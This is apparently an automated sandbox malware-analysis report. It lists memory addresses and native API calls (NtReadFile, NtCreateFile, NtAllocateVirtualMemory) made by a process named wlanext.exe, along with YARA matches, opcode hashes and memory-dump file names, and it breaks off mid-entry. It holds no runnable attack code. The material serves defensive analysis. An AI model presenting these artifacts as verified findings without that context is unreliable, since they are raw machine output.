                                                                                                                                                    0x009822df
                                                                                                                                                    0x009822e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822e6
                                                                                                                                                    0x009822e9
                                                                                                                                                    0x009822f4
                                                                                                                                                    0x009822f9
                                                                                                                                                    0x009822fa
                                                                                                                                                    0x00982305
                                                                                                                                                    0x00982314
                                                                                                                                                    0x00982319
                                                                                                                                                    0x0098231a
                                                                                                                                                    0x0098231d
                                                                                                                                                    0x00982320
                                                                                                                                                    0x00982323
                                                                                                                                                    0x00982323
                                                                                                                                                    0x00982328
                                                                                                                                                    0x0098232d
                                                                                                                                                    0x0098232f
                                                                                                                                                    0x00982331
                                                                                                                                                    0x00982336
                                                                                                                                                    0x00982336
                                                                                                                                                    0x0098233b
                                                                                                                                                    0x0098233d
                                                                                                                                                    0x00982350
                                                                                                                                                    0x00982351
                                                                                                                                                    0x00982356
                                                                                                                                                    0x00982359
                                                                                                                                                    0x00982359
                                                                                                                                                    0x0098235b
                                                                                                                                                    0x0098235d
                                                                                                                                                    0x00945367
                                                                                                                                                    0x0094536b
                                                                                                                                                    0x00945372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982363
                                                                                                                                                    0x00982363
                                                                                                                                                    0x00982369
                                                                                                                                                    0x0098236a
                                                                                                                                                    0x0098236c
                                                                                                                                                    0x00982371
                                                                                                                                                    0x00982373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00982379
                                                                                                                                                    0x00982379
                                                                                                                                                    0x0098237a
                                                                                                                                                    0x0098237f
                                                                                                                                                    0x0098237f
                                                                                                                                                    0x00982385
                                                                                                                                                    0x00982386
                                                                                                                                                    0x00982389
                                                                                                                                                    0x0098238e
                                                                                                                                                    0x00982390
                                                                                                                                                    0x00945378
                                                                                                                                                    0x0094537c
                                                                                                                                                    0x00982396
                                                                                                                                                    0x00982396
                                                                                                                                                    0x00982397
                                                                                                                                                    0x0098239c
                                                                                                                                                    0x009823a2
                                                                                                                                                    0x009823a3
                                                                                                                                                    0x009823a6
                                                                                                                                                    0x009823ab
                                                                                                                                                    0x009823ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009823b3
                                                                                                                                                    0x009823b3
                                                                                                                                                    0x009823b4
                                                                                                                                                    0x009823b9
                                                                                                                                                    0x009823ba
                                                                                                                                                    0x009823ba
                                                                                                                                                    0x009823bc
                                                                                                                                                    0x009823bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979153
                                                                                                                                                    0x00979158
                                                                                                                                                    0x0097915a
                                                                                                                                                    0x0097915e
                                                                                                                                                    0x00979160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979166
                                                                                                                                                    0x00979166
                                                                                                                                                    0x00979171
                                                                                                                                                    0x00979176
                                                                                                                                                    0x00979176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979160
                                                                                                                                                    0x009823c6
                                                                                                                                                    0x009823cb
                                                                                                                                                    0x009823ce
                                                                                                                                                    0x009823d7
                                                                                                                                                    0x009823d7
                                                                                                                                                    0x009823ad
                                                                                                                                                    0x00982390
                                                                                                                                                    0x00982373
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x00982291
                                                                                                                                                    0x00982291
                                                                                                                                                    0x00982293
                                                                                                                                                    0x00982295
                                                                                                                                                    0x0098229a
                                                                                                                                                    0x009822a1
                                                                                                                                                    0x009822a3
                                                                                                                                                    0x009822a7
                                                                                                                                                    0x009822a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822ab
                                                                                                                                                    0x009822ad
                                                                                                                                                    0x009822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822af
                                                                                                                                                    0x009822b1
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x0098228f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098226d
                                                                                                                                                    0x009453cb
                                                                                                                                                    0x009453ce
                                                                                                                                                    0x009453d0
                                                                                                                                                    0x009453d4
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453d8
                                                                                                                                                    0x009453e3
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009822F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Resource at %p, xrefs: 0098230B
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009822FC
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00982328
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                                                                                    • Instruction ID: cb1b6fc7e38465670291edf029cc9b26bb7b5b1358641e454a77219d92c1c855
                                                                                                                                                    • Opcode Fuzzy Hash: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                                                                                    • Instruction Fuzzy Hash: AF512671700705ABDB14EF68DC81FA6739CEF98760F114229FD18DB282EA65ED418BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Analysis Process: wlanext.exe PID: 1428 Parent PID: 1388 wlanext.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 000D8222, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000D82C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: 9$!:
                                                                                                                                                    • API String ID: 2738559852-2940118174
                                                                                                                                                    • Opcode ID: abf5278e8540d4ea5905ef30342c47f9ba828cac3fbda6a447cdebdc4f11bcbc
                                                                                                                                                    • Instruction ID: ad52d4d1fa4c58c12c8fc1c84e9bc77070acd5d020a6dab97f03ac6f9dfebb6f
                                                                                                                                                    • Opcode Fuzzy Hash: abf5278e8540d4ea5905ef30342c47f9ba828cac3fbda6a447cdebdc4f11bcbc
                                                                                                                                                    • Instruction Fuzzy Hash: 1311C0B6200108AFCB14DFA9D880DEB77AAAF8C354F158249FA1DA3241C630E8518BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D81D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000D821D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction ID: a4e13bb10a32d1aefb8ea9b526925838d165b3bee3edd4daf31b229b7121f919
                                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction Fuzzy Hash: B1F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D81CB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000D821D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 920ab7eabea7f7a9b589d830073e3aaaf4ec3dbf92e9582d46a3daece6709f26
                                                                                                                                                    • Instruction ID: 0fdf115eba095590fc39d15cc0d0d1866277a7003a026283d8e3947a373a5f47
                                                                                                                                                    • Opcode Fuzzy Hash: 920ab7eabea7f7a9b589d830073e3aaaf4ec3dbf92e9582d46a3daece6709f26
                                                                                                                                                    • Instruction Fuzzy Hash: CDF0ECB6214148ABCB08CF99D884CEB77A9FF8C354B15964DF95D93202D630E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D8280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000D82C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:
                                                                                                                                                    • API String ID: 2738559852-2648069889
                                                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                    • Instruction ID: 970e069722212f5e17f66fae4c5bd0161e60f9d7e1a2ad145721026d0b4120c8
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                    • Instruction Fuzzy Hash: 14F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8118BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D827B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000D82C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:
                                                                                                                                                    • API String ID: 2738559852-2648069889
                                                                                                                                                    • Opcode ID: 322c78cca54b242be09b847b7fc3dfbedccd98ff1fd8af196b1e63ad4ddb80b2
                                                                                                                                                    • Instruction ID: 8bceaa8eda61a4b42d7d65c573f9174c668e4582b6d0b0b476768411fec762b2
                                                                                                                                                    • Opcode Fuzzy Hash: 322c78cca54b242be09b847b7fc3dfbedccd98ff1fd8af196b1e63ad4ddb80b2
                                                                                                                                                    • Instruction Fuzzy Hash: F6F01DB2200149AFCB05DFA8D880CEB7BA9EF8C314B05864DF95D93205C630E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D8300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(@=,?,?,000D3D40,00000000,FFFFFFFF), ref: 000D8325
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID: @=
                                                                                                                                                    • API String ID: 3535843008-2609012945
                                                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                    • Instruction ID: 696aaae46cbdf264c9a907dbde8a46f22eaa1689bf8d0f268db36b2129905c3d
                                                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                    • Instruction Fuzzy Hash: 4CD012752003146BD710EF98CC45ED7775DEF44750F154455BA185B282C570F90087E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D842A, Relevance: 1.5, APIs: 1, Instructions: 45memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D83E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 0a4983a6acb091d63ca50679ae584d61be8cd46103977250c4032d8cbcdab593
                                                                                                                                                    • Instruction ID: efad4a61d2a6b13dba6208b17820210162b67c90a1c941280570ca18515132ec
                                                                                                                                                    • Opcode Fuzzy Hash: 0a4983a6acb091d63ca50679ae584d61be8cd46103977250c4032d8cbcdab593
                                                                                                                                                    • Instruction Fuzzy Hash: 740181B12042446FCB14CFA9DCC5DE77BADEF98610F14858DF9598B242C531E914CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D83AA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D83E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: c9121bca1e08dd86df2ff57a2cb78d281c5f742e08470a5dda110b8c09a129ef
                                                                                                                                                    • Instruction ID: ff49f12f1dd826c4709a5e88d4f03fe28d92d04384c7e5f49ab68266423dfd08
                                                                                                                                                    • Opcode Fuzzy Hash: c9121bca1e08dd86df2ff57a2cb78d281c5f742e08470a5dda110b8c09a129ef
                                                                                                                                                    • Instruction Fuzzy Hash: 67F05EB2204208AFCB14DF99DC81EEB77A9AF98340F15864DF90997291C630E810CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D83B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D83E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                    • Instruction ID: 30bb0deaee3669cb4d0a3ee2d22e586e4112e190f5a982268b17964d4538549c
                                                                                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                    • Instruction Fuzzy Hash: 2BF015B2200208ABCB14DF89CC81EEB77ADAF88750F118149BE0897281C630F810CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 020200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 020207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
